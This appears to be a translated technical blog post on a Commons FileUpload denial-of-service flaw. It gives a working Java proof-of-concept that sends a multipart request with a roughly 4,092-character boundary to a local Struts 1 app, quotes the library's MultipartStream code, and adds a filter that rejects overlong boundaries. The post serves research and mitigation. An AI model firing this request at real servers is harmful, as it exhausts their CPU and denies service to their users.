Tags: fileupload, DoS attack
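Note: this article is for technical discussion, research, and testing only. I was recently patching the Struts 1 vulnerability that allows the classLoader to be manipulated (Struts 2 has the same vulnerability, but that is outside the scope of this article), so I ran the tests directly on the Struts 1 project I had set up. How to create a Struts 1 project is outside the scope of this article; you can download a Struts 1 sample program here (http://download.csdn.net/detail/sunxing007/7350433). The simplest possible hello world Struts 1 program is enough. Then start Tomcat and deploy the project.

Next, use the Apache HttpComponents library to write a program that sends "a specially crafted HTTP request containing a malformed header". The key code is as follows (HttpUtil.java in the downloaded attachment contains the complete code):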

    public static void testCommonFileUploadVelnerability() throws ClientProtocolException, IOException{
        CloseableHttpClient httpClient = createHttpClient();
        HttpPost post = new HttpPost("http://localhost:8080/Struts1/helloWorld.do");
        String boundary = "";
        for(int i=0; i<4092; i++){
            boundary += "a";
        }
        post.setHeader("Content-Type", "multipart/form-data; boundary=#{" + boundary + "}");
        post.setHeader("lf-None-Match","59e532f501ac13174dd9c488f897ee75");
        String body = "";
        for(int i=0; i<4097; i++){
            body +="b";
        }
        post.setEntity(new StringEntity(body));
        CloseableHttpResponse response = httpClient.execute(post, DEFAULT_CONTEXT);
        HttpEntity entity = response.getEntity();
        System.out.println(EntityUtils.toString(entity));
        System.out.println("Over!");
    }

Run this program and you will find that it never returns. Open Task Manager and you will see CPU usage at 100%; after Tomcat is shut down, CPU usage immediately drops back to a normal level.

    try {
        multi = new MultipartStream(input, boundary, notifier);
    } catch (IllegalArgumentException iae) {
        throw new InvalidContentTypeException(
                format("The boundary specified in the %s header is too long", CONTENT_TYPE), iae);
    }

    public MultipartStream(InputStream input,
            byte[] boundary,
            int bufSize,
            ProgressNotifier pNotifier) {
        if (boundary == null) {
            throw new IllegalArgumentException("boundary may not be null");
        }
        this.input = input;
        this.bufSize = bufSize;
        this.buffer = new byte[bufSize];
        this.notifier = pNotifier;
        // We prepend CR/LF to the boundary to chop trailing CR/LF from
        // body-data tokens.
        this.boundaryLength = boundary.length + BOUNDARY_PREFIX.length;
        if (bufSize < this.boundaryLength + 1) {
            throw new IllegalArgumentException(
                    "The buffer size specified for the MultipartStream is too small");
        }
        this.boundary = new byte[this.boundaryLength];
        this.keepRegion = this.boundary.length;
        System.arraycopy(BOUNDARY_PREFIX, 0, this.boundary, 0,
                BOUNDARY_PREFIX.length);
        System.arraycopy(boundary, 0, this.boundary, BOUNDARY_PREFIX.length,
                boundary.length);
        head = 0;
        tail = 0;
    }
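
As an added example (not code from the original post or from Commons FileUpload), the length condition from the constructor check above can also be applied to the Content-Type header before a request reaches the parser, for instance from a servlet filter, which helps where the library cannot be updated right away. The class and method names are hypothetical, and the 4096-byte buffer size is an assumption.

```java
import java.util.Locale;

// Added example: class and method names are hypothetical, not Commons FileUpload API.
public class BoundaryGuard {
    // Assumption: the parser uses MultipartStream's default 4096-byte buffer.
    static final int BUF_SIZE = 4096;
    // MultipartStream prepends CR LF '-' '-' (BOUNDARY_PREFIX) to the boundary.
    static final int PREFIX_LEN = 4;

    /** Returns the boundary parameter of a multipart Content-Type, or null if absent. */
    static String boundaryOf(String contentType) {
        if (contentType == null) return null;
        String[] parts = contentType.split(";");
        if (!parts[0].trim().toLowerCase(Locale.ROOT).startsWith("multipart/")) return null;
        for (int i = 1; i < parts.length; i++) {
            String p = parts[i].trim();
            if (p.regionMatches(true, 0, "boundary=", 0, 9)) {
                String b = p.substring(9).trim();
                if (b.length() >= 2 && b.startsWith("\"") && b.endsWith("\"")) {
                    b = b.substring(1, b.length() - 1); // strip optional quotes
                }
                return b;
            }
        }
        return null;
    }

    /** Mirrors the constructor check: refuse when bufSize < boundaryLength + 1. */
    static boolean fitsBuffer(String boundary) {
        int boundaryLength = boundary.length() + PREFIX_LEN; // ISO-8859-1: 1 byte per char
        return BUF_SIZE >= boundaryLength + 1;
    }

    /** True when the request should be rejected (for example with HTTP 400) before parsing. */
    static boolean shouldReject(String contentType) {
        String b = boundaryOf(contentType);
        if (b == null) return false; // not multipart, or no boundary: nothing to check here
        return b.isEmpty() || !fitsBuffer(b);
    }

    public static void main(String[] args) {
        // Constructed inputs: an ordinary boundary and one sized like the test request above.
        String normal = "multipart/form-data; boundary=----WebKitFormBoundaryAbC123";
        String longB = "multipart/form-data; boundary=#{" + "a".repeat(4092) + "}";
        System.out.println("normal rejected: " + shouldReject(normal));
        System.out.println("long rejected:   " + shouldReject(longB));
    }
}
```

RFC 2046 limits a multipart boundary to 70 characters, so a stricter deployment can reject anything longer than that instead of comparing against the buffer size.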
Original article: http://blog.csdn.net/u012792219/article/details/25881407